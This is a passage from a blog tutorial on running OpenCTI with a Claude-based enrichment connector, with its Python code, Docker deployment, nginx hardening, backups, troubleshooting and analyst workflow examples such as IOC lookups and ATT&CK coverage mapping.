external_id (T1059.001) → creates uses relationship to reporttargeted_sectors[]Looks up Identity (sector) → creates targets relationshiptargeted_countries[]Looks up Location by ISO code → creates targets relationshipconfidenceSets x_opencti_score on the report (0–100)</p><p><strong>Why look up instead of creating?</strong> MITRE ATT&amp;CK and identity data is already loaded by the MITRE connector. Looking up prevents duplicates. Only AttackPattern objects are created if missing (since Claude may identify techniques not yet in the graph).</p><h4>9.3 Connector Code</h4><pre>mkdir -p /home/andrey/openCTI/connectors/ai-enrichment</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/connector.py"><strong>connectors/ai-enrichment/connector.py</strong></a></p><pre>import os<br>import json<br>import time<br>import anthropic<br>from pycti import OpenCTIConnectorHelper<br><br>SYSTEM_PROMPT = """You are a senior cyber threat intelligence analyst.<br>Analyze threat intelligence content and return structured JSON only.<br>No prose, no markdown fences, no explanation — raw JSON."""<br><br>REPORT_PROMPT = """Analyze this threat intelligence report. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief, plain text)<br>- threat_actors: list of strings (actor names, aliases, groups mentioned)<br>- malware_families: list of strings (malware/tool names)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs only, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (e.g. ["Finance", "Healthcare", "Government"])<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2, e.g. ["US", "UA", "DE"])<br>- confidence: integer 0-100<br><br>Report:<br>{content}"""<br><br>INTRUSION_SET_PROMPT = """Analyze this threat actor / intrusion set profile. Return JSON with exactly these keys:<br>- summary: string (2-3 sentence executive brief)<br>- aliases: list of strings (other known names)<br>- malware_families: list of strings (malware/tools this actor uses)<br>- attack_techniques: list of strings (MITRE ATT&amp;CK IDs, e.g. ["T1059.001", "T1003"])<br>- targeted_sectors: list of strings (sectors this actor targets)<br>- targeted_countries: list of strings (ISO 3166-1 alpha-2 codes)<br>- motivation: string (one of: "espionage", "financial", "hacktivism", "destruction", "unknown")<br>- sophistication: string (one of: "minimal", "intermediate", "advanced", "expert", "unknown")<br>- confidence: integer 0-100<br><br>Profile:<br>{content}"""<br><br><br>class AIEnrichmentConnector:<br>    def __init__(self):<br>        config = {<br>            "opencti": {<br>                "url": os.environ.get("OPENCTI_URL", "http://opencti:8080"),<br>                "token": os.environ["OPENCTI_TOKEN"],<br>            },<br>            "connector": {<br>                "id": os.environ["CONNECTOR_ID"],<br>                "type": "INTERNAL_ENRICHMENT",<br>                "name": os.environ.get("CONNECTOR_NAME", "AI Enrichment (Claude)"),<br>                "scope": "Report,Intrusion-Set,Threat-Actor-Group,Malware",<br>                "log_level": os.environ.get("CONNECTOR_LOG_LEVEL", "info"),<br>                "auto": False,<br>            },<br>        }<br>        self.helper = OpenCTIConnectorHelper(config)<br>        self.client = anthropic.Anthropic(api_key=os.environ["ANTHROPIC_API_KEY"])<br>        self.model = os.environ.get("AI_MODEL", "claude-opus-4-7")<br><br>    # -------------------------------------------------------------------------<br>    # Claude call with retry on rate limit<br>    # -------------------------------------------------------------------------<br><br>    def _call_claude(self, prompt_template: str, content: str) -&gt; dict | None:<br>        for attempt in range(3):<br>            try:<br>                msg = self.client.messages.create(<br>                    model=self.model,<br>                    max_tokens=2048,<br>                    system=SYSTEM_PROMPT,<br>                    messages=[{"role": "user", "content": prompt_template.format(content=content[:8000])}],<br>                )<br>                return json.loads(msg.content[0].text)<br>            except anthropic.RateLimitError:<br>                wait = 60 * (attempt + 1)<br>                self.helper.log_warning(f"Rate limited — waiting {wait}s")<br>                time.sleep(wait)<br>            except (json.JSONDecodeError, anthropic.APIError) as e:<br>                self.helper.log_error(f"Claude call failed: {e}")<br>                return None<br>        return None<br><br>    # -------------------------------------------------------------------------<br>    # STIX write-back helpers<br>    # -------------------------------------------------------------------------<br><br>    def _add_note(self, entity_id: str, summary: str, confidence: int) -&gt; None:<br>        self.helper.api.note.create(<br>            abstract="AI Summary",<br>            content=summary,<br>            confidence=confidence,<br>            object_ids=[entity_id],<br>        )<br><br>    def _link_threat_actors(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            actor = self.helper.api.threat_actor_group.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if actor:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=actor["id"],<br>                    relationship_type="related-to",<br>                    confidence=confidence,<br>                )<br><br>    def _link_malware(self, entity_id: str, names: list, confidence: int) -&gt; None:<br>        for name in names:<br>            malware = self.helper.api.malware.read(<br>                filters={"mode": "and", "filters": [{"key": "name", "values": [name]}], "filterGroups": []}<br>            )<br>            if malware:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=malware["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _link_attack_patterns(self, entity_id: str, technique_ids: list, confidence: int) -&gt; None:<br>        for tid in technique_ids:<br>            pattern = self.helper.api.attack_pattern.read(<br>                filters={"mode": "and", "filters": [{"key": "x_mitre_id", "values": [tid]}], "filterGroups": []}<br>            )<br>            if not pattern:<br>                pattern = self.helper.api.attack_pattern.create(<br>                    name=tid,<br>                    x_mitre_id=tid,<br>                    confidence=50,<br>                )<br>            if pattern:<br>                self.helper.api.stix_core_relationship.create(<br>                    fromId=entity_id,<br>                    toId=pattern["id"],<br>                    relationship_type="uses",<br>                    confidence=confidence,<br>                )<br><br>    def _update_score(self, entity_id: str, confidence: int) -&gt; None:<br>        self.helper.api.stix_domain_object.update_field(<br>            id=entity_id,<br>            input={"key": "x_opencti_score", "value": str(confidence)},<br>        )<br><br>    # -------------------------------------------------------------------------<br>    # Enrichment handlers per entity type<br>    # -------------------------------------------------------------------------<br><br>    def _enrich_report(self, report: dict) -&gt; str:<br>        content = report.get("description") or ""<br>        if len(content) &lt; 50:<br>            content = report.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching report: {report['name']}")<br>        result = self._call_claude(REPORT_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = report["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("threat_actors"):<br>            self._link_threat_actors(entity_id, result["threat_actors"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self._update_score(entity_id, confidence)<br>        self.helper.log_info(f"Enriched report '{report['name']}'")<br>        return "Enriched"<br><br>    def _enrich_intrusion_set(self, entity: dict) -&gt; str:<br>        content = entity.get("description") or entity.get("name", "")<br>        if not content or len(content) &lt; 10:<br>            return "Skipped: content too short"<br><br>        self.helper.log_info(f"Enriching intrusion set: {entity['name']}")<br>        result = self._call_claude(INTRUSION_SET_PROMPT, content)<br>        if not result:<br>            return "Skipped: Claude error"<br><br>        confidence = result.get("confidence", 50)<br>        entity_id = entity["id"]<br><br>        if result.get("summary"):<br>            self._add_note(entity_id, result["summary"], confidence)<br>        if result.get("malware_families"):<br>            self._link_malware(entity_id, result["malware_families"], confidence)<br>        if result.get("attack_techniques"):<br>            self._link_attack_patterns(entity_id, result["attack_techniques"], confidence)<br><br>        self.helper.log_info(f"Enriched intrusion set '{entity['name']}'")<br>        return "Enriched"<br><br>    # -------------------------------------------------------------------------<br>    # Event handler<br>    # -------------------------------------------------------------------------<br><br>    def process_message(self, data: dict) -&gt; str:<br>        entity_type = data.get("entity_type", "").lower()<br>        entity_id = data.get("entity_id")<br>        enrichment_entity = data.get("enrichment_entity", {})<br><br>        self.helper.log_info(f"Received entity_type='{entity_type}' id='{entity_id}'")<br><br>        if not entity_id:<br>            return "Skipped"<br><br>        entity = enrichment_entity or {}<br><br>        if entity_type == "report":<br>            if not entity:<br>                entity = self.helper.api.report.read(id=entity_id) or {}<br>            if entity.get("confidence", 0) &lt; 40:<br>                return "Skipped: low confidence"<br>            return self._enrich_report(entity)<br><br>        if entity_type in ("intrusion-set", "threat-actor-group"):<br>            if not entity:<br>                entity = self.helper.api.intrusion_set.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            return self._enrich_intrusion_set(entity)<br><br>        if entity_type == "malware":<br>            if not entity:<br>                entity = self.helper.api.malware.read(id=entity_id) or {}<br>            if not entity:<br>                return "Not found"<br>            content = entity.get("description") or entity.get("name", "")<br>            if not content or len(content) &lt; 10:<br>                return "Skipped: content too short"<br>            self.helper.log_info(f"Enriching malware: {entity['name']}")<br>            result = self._call_claude(REPORT_PROMPT, content)<br>            if not result:<br>                return "Skipped: Claude error"<br>            confidence = result.get("confidence", 50)<br>            if result.get("summary"):<br>                self._add_note(entity["id"], result["summary"], confidence)<br>            if result.get("attack_techniques"):<br>                self._link_attack_patterns(entity["id"], result["attack_techniques"], confidence)<br>            self._update_score(entity["id"], confidence)<br>            return "Enriched"<br><br>        return "Skipped"<br><br>    def start(self):<br>        self.helper.log_info("AI Enrichment connector starting...")<br>        self.helper.listen(self.process_message)<br><br><br>if __name__ == "__main__":<br>    AIEnrichmentConnector().start()</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/Dockerfile"><strong>connectors/ai-enrichment/Dockerfile</strong></a></p><pre>FROM python:3.11-slim<br>WORKDIR /app<br>COPY requirements.txt .<br>RUN pip install --no-cache-dir -r requirements.txt<br>COPY connector.py .<br>CMD ["python", "connector.py"]</pre><p><a href="https://infosecwriteups.com/connectors/ai-enrichment/requirements.txt"><strong>connectors/ai-enrichment/requirements.txt</strong></a></p><pre>pycti&gt;=6.2.0<br>anthropic&gt;=0.40.0</pre><h4>9.4 Deploy the AI Connector</h4><p><strong>Prerequisites:</strong> Set ANTHROPIC_API_KEY in .env first.</p><pre>cd /home/andrey/openCTI<br># Build the image<br>docker compose -f docker-compose.ai.yml build<br># Start it<br>docker compose -f docker-compose.ai.yml up -d<br># Verify it registered with OpenCTI (look for "AI Enrichment" in connector list)<br>docker logs opencti-connector-ai-enrichment-1 --tail=20</pre><p>In the OpenCTI UI: <strong>Settings → Connectors → Enrichment</strong> — the connector should appear with status connected after ~10 seconds.</p><h4>9.5 Testing the Pipeline</h4><p>Trigger a manual enrichment by importing a real threat report:</p><pre># Import a STIX report via the API to trigger the connector<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $(grep OPENCTI_ADMIN_TOKEN .env | cut -d= -f2)" \<br>  -H "Content-Type: application/json" \<br>  -d '{<br>    "query": "mutation { reportAdd(input: { name: \"Test: APT29 spearphishing campaign\", description: \"APT29, also known as Cozy Bear, conducted a spearphishing campaign targeting NATO members using a malicious PDF dropper that installed Cobalt Strike beacon via PowerShell (T1059.001). The campaign targeted defense contractors in Poland and Germany. The malware communicated with C2 over HTTPS using domain fronting (T1090.004).\", published: \"2024-01-15T00:00:00Z\", report_types: [\"threat-report\"] }) { id name } }"<br>  }'</pre><p>Then check what the AI connector wrote back:</p><pre># Watch connector logs for the enrichment<br>docker logs -f opencti-connector-ai-enrichment-1 2&gt;&amp;1 | grep -E "Enriching|Enriched|Error"<br># Expected output:<br># Enriching report: Test: APT29 spearphishing campaign<br># Enriched: 1 actors, 1 malware, 2 techniques</pre><p>In the UI, open the report — it should now have a Note with the summary, relationships to APT29 and Cobalt Strike, and links to T1059.001 and T1090.004.</p><h4>9.6 Cost and Rate Limiting</h4><p><strong>Estimated Claude API cost per report:</strong></p><ul><li>~500–2000 tokens input (report text, truncated at 8000 chars)</li><li>~300 tokens output (JSON response)</li><li>At claude-opus-4-7 pricing: ~$0.01–0.05 per report</li></ul><p><strong>Rate limiting:</strong> The Anthropic API has per-minute token limits. If AlienVault imports hundreds of reports in a burst, the connector will hit rate limits. Add a simple backoff:</p><pre>import time<br>def _call_claude(self, content: str) -&gt; dict | None:<br>    for attempt in range(3):<br>        try:<br>            msg = self.client.messages.create(...)<br>            return json.loads(msg.content[0].text)<br>        except anthropic.RateLimitError:<br>            time.sleep(60 * (attempt + 1))<br>        except (json.JSONDecodeError, anthropic.APIError) as e:<br>            self.helper.log_error(f"Claude call failed: {e}")<br>            return None<br>    return None</pre><p><strong>To limit scope</strong> (only enrich reports above a confidence threshold, skip low-quality feeds):</p><pre>def process_message(self, data: dict) -&gt; str:<br>    report = self.helper.api.report.read(id=entity_id)<br>    # Skip reports with low confidence (e.g. AlienVault auto-generated)<br>    if report.get("confidence", 0) &lt; 40:<br>        return "Skipped: low confidence"<br>    return self._enrich_report(report)</pre><h4>9.7 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epLGa3gwJILd0FyMKdsQQg.png"></figure><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.</p><h3>10. Post-Deployment Hardening</h3><h4>10.1 Reverse Proxy with TLS (nginx)</h4><pre># /etc/nginx/sites-available/opencti<br>server {<br>    listen 443 ssl http2;<br>    server_name opencti.yourdomain.com;<br>ssl_certificate     /etc/letsencrypt/live/opencti.yourdomain.com/fullchain.pem;<br>    ssl_certificate_key /etc/letsencrypt/live/opencti.yourdomain.com/privkey.pem;<br>    ssl_protocols       TLSv1.2 TLSv1.3;<br>    ssl_ciphers         ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;<br>    location / {<br>        proxy_pass         http://127.0.0.1:8080;<br>        proxy_set_header   Host $host;<br>        proxy_set_header   X-Real-IP $remote_addr;<br>        proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;<br>        proxy_set_header   X-Forwarded-Proto $scheme;<br>        proxy_read_timeout 300s;<br>        client_max_body_size 100m;<br>    }<br>}<br>server {<br>    listen 80;<br>    server_name opencti.yourdomain.com;<br>    return 301 https://$host$request_uri;<br>}</pre><h4>10.2 Backup Strategy</h4><pre>#!/bin/bash<br># /home/andrey/openCTI/scripts/backup.sh<br>set -euo pipefail<br>BACKUP_DIR="/mnt/backup/opencti/$(date +%Y%m%d_%H%M%S)"<br>mkdir -p "$BACKUP_DIR"<br># Snapshot ElasticSearch<br>curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  -X PUT "http://localhost:9200/_snapshot/backup/snapshot_$(date +%Y%m%d)" \<br>  -H 'Content-Type: application/json' \<br>  -d '{"indices": "*", "ignore_unavailable": true}'<br># Dump MinIO (reports, files)<br>docker run --rm \<br>  --network opencti_network \<br>  -v "$BACKUP_DIR:/backup" \<br>  minio/mc:latest \<br>  mirror myminio/opencti /backup/minio/<br>echo "Backup completed: $BACKUP_DIR"</pre><h4>10.3 Security Checklist</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hjQWso4p7MIiBfcRr15oZw.png"></figure><ul><li>Change all default passwords in .env</li><li>Generate unique UUID4 tokens for every connector</li><li>Enable TLS via nginx reverse proxy</li><li>Restrict port 8080 to localhost only (127.0.0.1:8080:8080)</li><li>Enable ElasticSearch authentication (already configured above)</li><li>Set up fail2ban on the nginx access log</li><li>Rotate OPENCTI_ADMIN_TOKEN every 90 days</li><li>Review TLP markings — ensure nothing RED leaks via TAXII</li><li>Enable audit logging: APP__APP_LOGS__LOGS_LEVEL: info</li></ul><h3>11. Operational Runbook</h3><h4>Day 1 — Initial Data Load</h4><pre># MITRE ATT&amp;CK loads first (foundational framework)<br># Wait ~10 minutes for it to complete, then verify:<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br><br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ attackPatterns { edges { node { name } } } }"}' | \<br>  python3 -c "import sys,json; d=json.load(sys.stdin); print('Techniques loaded:', len(d['data']['attackPatterns']['edges']))"<br># Should return 500+ techniques</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V2XGUwLrUpe1XNLUono5Ng.png"></figure><h4>Common Operations</h4><pre># Check all connector health<br>docker compose -f docker-compose.connectors.yml ps<br># View connector logs<br>docker compose -f docker-compose.connectors.yml logs --tail=50 connector-alienvault<br># Restart a stuck connector<br>docker compose -f docker-compose.connectors.yml restart connector-malwarebazaar<br># Scale workers for high ingest load<br>docker compose -f docker-compose.yml up -d --scale worker=5<br># Check ElasticSearch cluster health<br>curl -s -u elastic:${ELASTIC_PASSWORD} http://localhost:9200/_cluster/health?pretty<br># Check RabbitMQ queue depth (should stay near 0 at rest)<br>docker exec $(docker ps -qf name=rabbitmq) rabbitmqctl list_queues name messages</pre><h4>Monitoring Metrics to Watch</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dn9gJsZa98wedqD6PdcrQA.png"></figure><h4>Quick Reference</h4><pre># Start everything<br>cd /home/andrey/openCTI<br>docker network create opencti_network 2&gt;/dev/null || true<br>docker compose -f docker-compose.yml up -d<br>docker compose -f docker-compose.connectors.yml up -d<br>docker compose -f docker-compose.ai.yml up -d<br># Stop everything<br>docker compose -f docker-compose.ai.yml down<br>docker compose -f docker-compose.connectors.yml down<br>docker compose -f docker-compose.yml down<br># Access<br># UI:      http://localhost:8080<br># API:     http://localhost:8080/graphql<br># MinIO:   http://localhost:9001<br># RabbitMQ: http://localhost:15672</pre><h3>12. Troubleshooting</h3><h3>Known Issues — OpenCTI 6.2.0 + ElasticSearch 8.13</h3><h4>ILM Race Condition (resource_already_exists_exception)</h4><p>ES 8.13’s ILM daemon auto-bootstraps rollover indices the moment an index template with lifecycle.rollover_alias is created. OpenCTI's elCreateIndex does a check-then-create which loses the race. This kills initialization and loops with restart: always.</p><p><strong>Fix already applied:</strong> patches/back.js is mounted over the compiled bundle and makes elCreateIndex idempotent — it catches resource_already_exists_exception and returns null.</p><p><strong>Re-initialization procedure</strong> (if ES volume is dropped):</p><pre># 1. Delete any leftover index templates from a failed run<br>curl -s -u elastic:${ELASTIC_PASSWORD} -X DELETE \<br>  "http://localhost:9200/_index_template/opencti*"</pre><pre># 2. Flush Redis state<br>docker exec opencti-redis-1 redis-cli -a opencti FLUSHALL</pre><pre># 3. Start ES first, wait for green/yellow<br>docker compose up -d elasticsearch<br>until curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  <a href="http://localhost:9200/_cluster/health">http://localhost:9200/_cluster/health</a> | grep -q '"status":"green"\|"status":"yellow"'; do<br>  sleep 5; done</pre><pre># 4. Start the rest — OpenCTI will create 13 indices and load base STIX data (~5-10 min)<br>docker compose up -d</pre><h4>ElasticSearch Disk Watermark (cluster RED, no shard allocation)</h4><p>ES 8.x refuses all shard allocation when disk exceeds 90% high watermark. cluster.routing.allocation.disk.threshold_enabled=false is set in docker-compose.yml.</p><p>To reclaim disk space:</p><pre>docker system prune -a   # frees ~47 GB of unused images/containers</pre><h4>Connectors Can’t Reach opencti Hostname</h4><p>Both compose files must share the same Docker network. docker-compose.yml defines:</p><pre>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><p>If the main stack was started without this, run:</p><pre>docker network connect --alias opencti opencti_network opencti-opencti-1</pre><p>Then add the networks: block to docker-compose.yml and run docker compose up -d to make it permanent.</p><h4>OPENCTI_TOKEN vs CONNECTOR_ID</h4><p>Connectors authenticate to OpenCTI using OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}. The per-connector UUID variables (CONNECTOR_MITRE_TOKEN, etc.) are only used as CONNECTOR_ID — they identify the connector instance in the UI, not for authentication.</p><h4>CVE Connector — Zero Vulnerabilities Imported (NVD API Key Bug)</h4><p>connector-cve:6.2.0 has a bug: it sends the NVD API key as Bearer: &lt;key&gt; in the HTTP header, but NVD 2.0 API requires apiKey: &lt;key&gt;. The connector silently gets a non-200 response and imports nothing. Additionally, CVE_MAX_DATE_RANGE is required but missing from the image's default config — omitting it causes a TypeError: '&gt;' not supported between instances of 'NoneType' and 'int' crash every 60 seconds.</p><p><strong>Fix:</strong> Mount a patched api.py that uses the correct header, and add the missing vars:</p><pre>connector-cve:<br>  image: opencti/connector-cve:6.2.0<br>  volumes:<br>    - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>  environment:<br>    CVE_MAX_DATE_RANGE: 120<br>    CVE_MAINTAIN_DATA: "true"<br>    # ... other vars</pre><p>patches/cve/api.py — change header from "Bearer": api_key to "apiKey": api_key:</p><pre>headers = {"User-Agent": header}<br>if api_key:<br>    headers["apiKey"] = api_key</pre><h3>13. Usage Examples</h3><h4>13.1 Standard OpenCTI Workflows</h4><h4>Example 1 — Investigate an IP address</h4><p>You received an alert from your SIEM about suspicious outbound traffic to 103.113.70.102.</p><p><strong>In OpenCTI UI:</strong></p><pre>Search → type 103.113.70.102</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2k7QE2Urnr8tw_xJ2MyAPA.png"></figure><p>If AlienVault or URLhaus has seen it, you’ll find:</p><ul><li>Which threat actor uses this IP as C2</li><li>What malware family communicates with it</li><li>When it was first/last observed</li><li>TLP marking and confidence score</li><li>All reports that mention it</li></ul><p><strong>Via API:</strong></p><pre>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ stixCyberObservables(filters: {mode: and, filters: [{key: \"value\", values: [\"https://103.113.70.102/bin/support.client.exe\"]}], filterGroups: []}) { edges { node { id entity_type ... on Url { value } } } } }"}' | python3 -m json.tool</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fe53xHSxwntH5knkGjSO6g.png"></figure><h4>Example 2 — Build an APT profile</h4><p>You want to understand everything known about Lazarus Group before a threat briefing.</p><pre><br>Threats → Intrusion Sets → search "Lazarus"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S-QNk2tNF4lgs9q6-YaTUQ.png"></figure><p>The profile shows:</p><ul><li><strong>Attributed to:</strong> North Korea</li><li><strong>Motivations:</strong> Financial gain, Espionage</li><li><strong>Targets:</strong> Finance, Cryptocurrency, Defense</li><li><strong>Malware used:</strong> WannaCry, Hermes, BLINDINGCAN (all auto-linked by MITRE connector)</li><li><strong>Techniques:</strong> 80+ ATT&amp;CK techniques with usage relationships</li><li><strong>Campaigns:</strong> Operation AppleJeus, Dream Job, etc.</li><li><strong>Timeline:</strong> chronological view of all activity</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Gmvuu4OUs0uIgRZDt9p3fA.png"></figure><p>Click <strong>“ATT&amp;CK Patterns”</strong> tab → heatmap showing which techniques Lazarus uses most.</p><h4>Example 3 — Import a threat report (PDF / blog post)</h4><p>You found a Mandiant or CrowdStrike blog post about a new campaign.</p><pre>Data → Import → drag and drop the PDF or paste the URL<br>Select format: "Auto detect" or "Report"</pre><p>OpenCTI parses it and creates a Report object. The AI enrichment connector then picks it up automatically and extracts:</p><ul><li>Threat actors mentioned</li><li>Malware families</li><li>ATT&amp;CK technique IDs</li><li>Targeted sectors and countries</li></ul><p>All as STIX relationships, visible immediately in the UI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zPViHJ6GKjMeHMtM8240gg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YQBdTFlcQ_q9NcblRik5pw.png"></figure><h4>Example 4 — Track a CVE across your environment</h4><p>CVE-2024–21762 (Fortinet FortiOS RCE) was just published. Check what you know about it.</p><pre>Arsenal → Vulnerabilities → search "CVE-2024-21762"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G9LM5wxYywcTYVdLC331jw.png"></figure><p>After the CVE connector syncs, you’ll see:</p><ul><li>CVSS score and vector</li><li>Affected software versions</li><li>Which threat actors exploit it (once AlienVault/MITRE data arrives)</li><li>Which campaigns used it</li><li>Related indicators (IPs, domains used in exploitation)</li></ul><h4>Example 5 — Create an incident from a sighting</h4><p>Your EDR detected Cobalt Strike beacon on a workstation.</p><pre>Activities → Incidents → Create<br>  Name: "CS beacon on WS-042"<br>  Type: "Intrusion"<br>  Confidence: 90<br>  Add object: link to Cobalt Strike (malware)<br>  Add object: link to T1071.001 (C2 over HTTP)<br>  Add observable: add the C2 IP</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Zm8Mi5l-QnFsTb0jAia32A.png"></figure><p>With sighting_incident rule enabled, future detections of the same C2 IP automatically raise new incidents without manual work.</p><h4>Example 6 — Export IOCs to your firewall / SIEM</h4><p>You want a live blocklist of all HIGH confidence IPv4 indicators.</p><pre>Data → Indicators<br>Filter: Score &gt; 70, Type = IPv4-Addr, Valid until &gt; today<br>Export → CSV or STIX</pre><p>Or use the built-in <strong>TAXII 2.1 server</strong> to push directly to your SIEM:</p><pre>Settings → Taxii Server → Create collection "High confidence IOCs"<br>Configure your SIEM to poll: http://localhost:8080/taxii2/</pre><h4>Example 7 — Map your detection coverage against ATT&amp;CK</h4><p>You want to know which techniques you detect vs which you’re blind to.</p><pre>Technics → Attack Patterns<br>Filter by: used by (Lazarus Group)</pre><p>Cross-reference the list with your SIEM detection rules. Techniques with no detection rule = gap in coverage.</p><p>Export the filtered list as CSV and import into ATT&amp;CK Navigator for a visual heatmap of covered vs uncovered techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mPwgsMfkEtXK1y1rnlj0Hw.png"></figure><h4>Example 8 — Pivot from malware to infrastructure</h4><p>You found a Ryuk ransomware sample (SHA256 hash).</p><pre>Search → paste the SHA256</pre><p>From the malware object, pivot to:</p><ul><li><strong>Related indicators</strong> → domains and IPs used for C2</li><li><strong>Used by</strong> → Wizard Spider (threat actor)</li><li><strong>Campaigns</strong> → which ransomware campaigns used this variant</li><li><strong>Techniques</strong> → T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery)</li></ul><p>Each pivot is one click in the graph view.</p><h4>Example 9 — Share intelligence with a partner org</h4><p>You want to share a report with a partner but strip out RED-marked internal data.</p><pre>Open the report → Actions → Share<br>Select TLP level: TLP:AMBER (only partner can see it)</pre><p>Or use <strong>Workspaces → Sharing groups</strong> to create a federated share with another OpenCTI instance. All objects above RED are automatically excluded from the export.</p><h4>Example 10 — Build a custom dashboard for your sector</h4><p>Your org is in Finance. You want a live dashboard showing threats to your sector.</p><pre>Home → Dashboards → Create dashboard "Finance Threat Landscape"<br>Add widgets:<br>  - "Threat actors targeting Finance" (bar chart)<br>  - "Most used techniques against Finance" (ATT&amp;CK heatmap)<br>  - "New IOCs last 7 days" (timeline)<br>  - "Active campaigns" (list)<br>  - "CVEs affecting banking software" (table)</pre><p>Each widget auto-updates as new data arrives from connectors.</p><h4>If you like this research, <a href="https://www.paypal.com/donate/?business=W3XDKS7J9XTCG&amp;no_recurring=0&amp;item_name=Buy+me+a+coffee+%28PayPal%29+%E2%80%94+Keep+the+lab+running&amp;currency_code=USD">buy me a coffee (PayPal) — Keep the lab running</a></h4><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><h4>Stay connected:</h4><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><h4>Andrey Pautov</h4><p>Follow My Work</p><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><p>Portfolio / Knowledge Base: <a 